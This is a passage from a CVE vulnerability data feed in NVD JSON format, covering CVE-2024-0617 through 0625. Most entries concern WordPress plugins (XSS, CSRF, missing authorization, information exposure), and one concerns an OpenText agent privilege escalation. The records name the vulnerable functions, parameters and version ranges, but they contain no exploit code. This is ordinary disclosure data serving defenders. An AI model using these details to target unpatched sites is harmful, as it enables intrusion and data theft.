"https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Passster – Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.2 via API. This makes it possible for unauthenticated attackers to obtain post titles, slugs, IDs, content and other metadata including passwords of password-protected posts and pages." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpchill:passster:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.2.6.3", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-27T17:30Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0617", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171", "name" : "https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171", "name" : "https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:quanticedgesolutions:category_discount_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.13", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-25T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0618", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0618/", "name" : "https://advisory.abay.sh/cve-2024-0618/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0618/", "name" : "https://advisory.abay.sh/cve-2024-0618/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php", "name" : "https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve", "refsource" : "", "tags" : [ "Exploit", "Patch", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve", "refsource" : "", "tags" : [ "Exploit", "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "5.1.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-27T06:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0619", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/payflex-payment-gateway/trunk/partpay.php#L751", "name" : "https://plugins.trac.wordpress.org/browser/payflex-payment-gateway/trunk/partpay.php#L751", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/payflex-payment-gateway/trunk/partpay.php#L751", "name" : "https://plugins.trac.wordpress.org/browser/payflex-payment-gateway/trunk/partpay.php#L751", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9f740cfa-7163-4634-9705-0e01ee571a11?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Payflex Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the payment_callback() function in all versions up to, and including, 2.5.0. This makes it possible for unauthenticated attackers to update the status of orders, which can potentially lead to revenue loss." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:payflex:payment_gateway:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.5.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-07-11T04:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0620", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The PPWP – Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.9 via API. This makes it possible for unauthenticated attackers to obtain post titles, IDs, slugs as well as other information including for password-protected posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:passwordprotectwp:password_protect_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.9.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-27T17:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0621", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3032350/", "name" : "https://plugins.trac.wordpress.org/changeset/3032350/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3032350/", "name" : "https://plugins.trac.wordpress.org/changeset/3032350/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple Share Buttons Adder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 8.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:simplesharebuttons:simple_share_buttons_adder:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "8.4.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-03-04T12:24Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0622", "ASSIGNER" : "security@opentext.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.microfocus.com/s/article/KM000026555?language=en_US", "name" : "https://portal.microfocus.com/s/article/KM000026555?language=en_US", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://portal.microfocus.com/s/article/KM000026555?language=en_US", "name" : "https://portal.microfocus.com/s/article/KM000026555?language=en_US", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Local privilege escalation vulnerability affects OpenText Operations Agent product versions 12.15 and 12.20-12.25 when installed on Non-Windows platforms. The vulnerability could allow local privilege escalation. \n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microfocus:operations_agent:12.15:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microfocus:operations_agent:*:*:*:*:*:*:*:*", "versionStartIncluding" : "12.20", "versionEndIncluding" : "12.25", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-15T21:15Z", "lastModifiedDate" : "2025-01-23T16:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0623", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vektor-inc:vk_block_patterns:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.31.1.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-20T06:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0624", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139", "name" : "https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139", "name" : "https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php", "name" : "https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php", "name" : "https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.12.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-25T02:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0625", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94", "name" : "https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94", "name" : "https://plugins.trac.wordpress.org/browser/wpfront-notification-bar/trunk/templates/template-wpfront-notification-bar.php#L94", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3025472%40wpfront-notification-bar&new=3025472%40wpfront-notification-bar&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPFront Notification Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpfront-notification-bar-options[custom_class]’ parameter in all versions up to, and including, 3.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpfront:wpfront_notification_bar:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.3.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : 